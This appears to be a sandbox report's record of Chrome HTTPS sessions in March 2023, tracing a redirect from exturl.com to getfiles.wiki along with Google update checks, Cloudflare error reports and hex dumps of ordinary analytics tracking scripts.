                                                                                                                  2023-03-21 12:20:51 UTC39INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  16192.168.2.2249217142.250.203.110443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:51 UTC34OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc HTTP/1.1
                                                                                                                  Host: clients2.google.com
                                                                                                                  Connection: keep-alive
                                                                                                                  X-Goog-Update-Interactivity: bg
                                                                                                                  X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm
                                                                                                                  X-Goog-Update-Updater: chromecrx-84.0.4147.135
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:51 UTC35INHTTP/1.1 200 OK
                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-e0ji3BJo80awXr1UO4W8oA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:51 GMT
                                                                                                                  Content-Type: text/xml; charset=UTF-8
                                                                                                                  X-Daynum: 5923
                                                                                                                  X-Daystart: 19251
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Server: GSE
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Accept-Ranges: none
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  2023-03-21 12:20:51 UTC36INData Raw: 33 31 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 39 32 33 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 31 39 32 35 31 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                  Data Ascii: 31a<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5923" elapsed_seconds="19251"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                  2023-03-21 12:20:51 UTC36INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 70 6b 65 64 63 6a 6b 64 65 66 67 70 64 65 6c 70 62 63 6d 62 6d 65 6f 6d 63 6a 62 65 65 6d 66 6d 22 20 73 74 61 74 75 73 3d 22 65 72 72 6f 72 2d 75 6e 6b 6e 6f 77 6e
                                                                                                                  Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><app appid="pkedcjkdefgpdelpbcmbmeomcjbeemfm" status="error-unknown
                                                                                                                  2023-03-21 12:20:51 UTC37INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  17192.168.2.224922235.190.80.1443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:51 UTC39OUTOPTIONS /report/v3?s=c8%2BCrm4NPt8S6LMv8LkUdKVGM1%2BdE8Prwy3CjAgKoWNEtN8TXYqpef2wgOOMPn7TKkUOyHWeJn3MNlMS7SZ6rVUAvqvRoTsTYnyjR4LbyjZapA8oYhK8KQrJoXYsjxwb HTTP/1.1
                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Origin: https://getfiles.wiki
                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:51 UTC39INHTTP/1.1 200 OK
                                                                                                                  content-length: 0
                                                                                                                  access-control-max-age: 86400
                                                                                                                  access-control-allow-methods: POST, OPTIONS
                                                                                                                  access-control-allow-origin: *
                                                                                                                  access-control-allow-headers: content-length, content-type
                                                                                                                  date: Tue, 21 Mar 2023 12:20:51 GMT
                                                                                                                  Via: 1.1 google
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  18192.168.2.224922435.190.80.1443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:51 UTC39OUTPOST /report/v3?s=c8%2BCrm4NPt8S6LMv8LkUdKVGM1%2BdE8Prwy3CjAgKoWNEtN8TXYqpef2wgOOMPn7TKkUOyHWeJn3MNlMS7SZ6rVUAvqvRoTsTYnyjR4LbyjZapA8oYhK8KQrJoXYsjxwb HTTP/1.1
                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 464
                                                                                                                  Content-Type: application/reports+json
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:51 UTC40OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 32 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 67 65 74 66 69 6c 65 73 2e 77 69 6b 69 2f 72 65 64 69 72 65 63 74 2e 70 68 70 3f 67 6a 68 61 67 64 6a 66 62 64 6a 6b 3d 4d 54 41 79 4c 6a 45 79 4f 53 34 78 4e 44 4d 75 4e 7a 67 3d 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22
                                                                                                                  Data Ascii: [{"age":1,"body":{"elapsed_time":326,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"
                                                                                                                  2023-03-21 12:20:51 UTC40INHTTP/1.1 200 OK
                                                                                                                  content-length: 0
                                                                                                                  date: Tue, 21 Mar 2023 12:20:51 GMT
                                                                                                                  Via: 1.1 google
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  19192.168.2.224926954.39.156.32443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:21:35 UTC41OUTGET /stats/e.php?4708787&@Ab&@R40431&@w HTTP/1.1
                                                                                                                  Host: s4.histats.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:21:35 UTC41INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 21 Mar 2023 12:21:35 GMT
                                                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                                                  Content-Length: 380
                                                                                                                  Connection: close
                                                                                                                  2023-03-21 12:21:35 UTC41INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 23 33 56 69 73 2e 20 74 6f 64 61 79 3d 31 31 30 36 22 3b 63 68 66 68 32 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73
                                                                                                                  Data Ascii: _HST_cntval="#3Vis. today=1106";chfh2(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="as


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  2192.168.2.2249188172.217.168.77443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:43 UTC1OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                  Host: accounts.google.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 1
                                                                                                                  Origin: https://www.google.com
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: CONSENT=WP.289365
                                                                                                                  2023-03-21 12:20:43 UTC1OUTData Raw: 20
                                                                                                                  Data Ascii:
                                                                                                                  2023-03-21 12:20:43 UTC3INHTTP/1.1 200 OK
                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                  Access-Control-Allow-Origin: https://www.google.com
                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:43 GMT
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp"
                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-9HTqeun2loieMPtrbJf89A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                                                  Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]}
                                                                                                                  Server: ESF
                                                                                                                  X-XSS-Protection: 0
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Accept-Ranges: none
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  2023-03-21 12:20:43 UTC5INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                  Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                  2023-03-21 12:20:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  20192.168.2.2249270141.101.120.11443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:21:35 UTC41OUTGET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php HTTP/1.1
                                                                                                                  Host: e.dtscout.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: m=1; oa=1; df=1679401250
                                                                                                                  2023-03-21 12:21:35 UTC42INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 21 Mar 2023 12:21:35 GMT
                                                                                                                  Content-Type: application/javascript
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  X-S: mtl3
                                                                                                                  Set-Cookie: m=2; Domain=dtscout.com; Expires=Tue, 21-Mar-2023 13:44:55 GMT; Max-Age=5000; Path=/; SameSite=None; Secure
                                                                                                                  Set-Cookie: oa=2; Domain=dtscout.com; Expires=Tue, 21-Mar-2023 16:21:35 GMT; Max-Age=14400; Path=/; SameSite=None; Secure
                                                                                                                  X-T: 0.524
                                                                                                                  Expires: Tue, 21 Mar 2023 12:21:34 GMT
                                                                                                                  Cache-Control: no-cache
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bxvohj55%2BwFtJYUfxhEkQ2zRLN9xTY%2F2IE76AslTk5na2XvEulHihkvHdr13amPXCQWcNAWWprSxP4vMEcVcksE4KoXVlEAdKFQFcJuPGrW8jc%2BLdgtofkcjYGIWmbI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 7ab627cf3adf0394-FRA
                                                                                                                  2023-03-21 12:21:35 UTC43INData Raw: 38 31 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 2e 65 78 65 63 29 7b 74 2e 65 78 65 63 3d 21 30 3b 76 61 72 20 72 3d 21 21 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 2c 63 3d 6c 28 29 2c 61 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 72 65 70 6c 61 63 65 28 22 77 77 77 2e 22 2c 22 22 29 2c 65 3d 22 5f 64 74 73 70 76 22 2c 69 3d 22 68 74 74 70 73 3a 2f 2f 74 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 70 76 2f 22 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 7c 7c 76 6f 69 64 20 30 21 3d 3d 28 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54
                                                                                                                  Data Ascii: 81f!function(t){if(!t.exec){t.exec=!0;var r=!!navigator.sendBeacon,c=l(),a=window.location.hostname.replace("www.",""),e="_dtspv",i="https://t.dtscout.com/pv/",o=document.getElementsByTagName("head")[0];if(void 0!==o||void 0!==(o=document.getElementsByT
                                                                                                                  2023-03-21 12:21:35 UTC43INData Raw: 6f 6f 6b 69 65 3d 74 2b 22 3d 22 2b 28 65 7c 7c 22 22 29 2b 22 3b 20 65 78 70 69 72 65 73 3d 22 2b 6e 2e 74 6f 55 54 43 53 74 72 69 6e 67 2b 22 3b 20 70 61 74 68 3d 2f 22 7d 7d 3b 76 61 72 20 73 3d 21 31 2c 64 3d 6d 28 29 3b 6e 75 6c 6c 3d 3d 64 26 26 28 73 3d 21 30 2c 64 3d 7b 73 73 3a 70 28 31 30 29 2c 73 74 3a 63 2c 73 6c 3a 63 2c 75 31 3a 63 2c 75 33 3a 63 2c 70 76 3a 30 2c 63 3a 7b 7d 7d 29 2c 22 70 6c 22 69 6e 20 74 26 26 68 28 74 2e 70 6c 2c 64 29 3b 76 61 72 20 75 3d 7b 61 3a 22 76 22 2c 68 3a 61 7d 3b 66 6f 72 28 76 61 72 20 76 20 69 6e 21 73 26 26 63 3e 64 2e 73 6c 2b 31 38 30 30 26 26 28 64 2e 73 73 3d 70 28 31 30 29 2c 64 2e 73 74 3d 63 2c 64 2e 70 76 3d 30 2c 75 2e 73 3d 31 29 2c 64 2e 70 76 2b 2b 2c 64 2e 73 6c 3d 63 2c 75 2e 73 73 3d 64 2e
                                                                                                                  Data Ascii: ookie=t+"="+(e||"")+"; expires="+n.toUTCString+"; path=/"}};var s=!1,d=m();null==d&&(s=!0,d={ss:p(10),st:c,sl:c,u1:c,u3:c,pv:0,c:{}}),"pl"in t&&h(t.pl,d);var u={a:"v",h:a};for(var v in!s&&c>d.sl+1800&&(d.ss=p(10),d.st=c,d.pv=0,u.s=1),d.pv++,d.sl=c,u.ss=d.
                                                                                                                  2023-03-21 12:21:35 UTC45INData Raw: 28 22 5f 22 2b 6f 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 5b 6f 5d 29 29 3b 6e 3d 6e 2e 6a 6f 69 6e 28 22 26 22 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 65 29 7b 76 61 72 20 6e 3d 65 7c 7c 6d 28 29 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 6e 75 6c 6c 3d 3d 6e 3f 6e 3d 7b 63 3a 7b 7d 7d 3a 22 63 22 69 6e 20 6e 7c 7c 28 6e 2e 63 3d 7b 7d 29 2c 74 29 6e 2e 63 5b 6f 5d 3d 74 5b 6f 5d 3b 66 28 6e 29 7d 7d 28 77 69 6e 64 6f 77 2e 5f 64 74 73 70 76 3d 77 69 6e 64 6f 77 2e 5f 64 74 73 70 76 7c 7c 7b 22 70 6c 22 3a 7b 22 63 63 22 3a 22 63 68 22 2c 22 70 6c 22 3a 22 64 22 7d 7d 29 3b 0a 0a 0d 0a
                                                                                                                  Data Ascii: ("_"+o+"="+encodeURIComponent(t[o]));n=n.join("&")}return n}function h(t,e){var n=e||m();for(var o in null==n?n={c:{}}:"c"in n||(n.c={}),t)n.c[o]=t[o];f(n)}}(window._dtspv=window._dtspv||{"pl":{"cc":"ch","pl":"d"}});
                                                                                                                  2023-03-21 12:21:35 UTC45INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  3192.168.2.224919538.128.66.115443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:43 UTC5OUTGET /r.php?key=pvwarw3 HTTP/1.1
                                                                                                                  Host: exturl.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:44 UTC6INHTTP/1.1 302 Found
                                                                                                                  Server: nginx/1.22.0
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: uclick=17xs3vbz0; expires=Wed, 22-Mar-2023 12:20:44 GMT; Max-Age=86400; path=/; secure; SameSite=none
                                                                                                                  Set-Cookie: uclickhash=17xs3vbz0-17xs3vbz0-bzfe-0-qdi4-hqbl-hqwj-1e3108; expires=Wed, 22-Mar-2023 12:20:44 GMT; Max-Age=86400; path=/; secure; SameSite=none
                                                                                                                  Location: https://getfiles.wiki/redirect.php
                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                  2023-03-21 12:20:44 UTC6INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  4192.168.2.2249196188.114.97.3443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:44 UTC6OUTGET /redirect.php HTTP/1.1
                                                                                                                  Host: getfiles.wiki
                                                                                                                  Connection: keep-alive
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:44 UTC7INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  vary: Accept-Encoding,User-Agent
                                                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SXklpxtuHPOD4HZqq8DEaVK5llmnNBP8Du25yIJ2YksDUkUM0UUPYXWVEQNNMS9ZKqqbAtYrY4fcd6UNnOsg1r5Pd9H7OvDxm5JBBuDgP1dhtzwR587nEamV4XOwNvet"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 7ab626906bd639d0-FRA
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
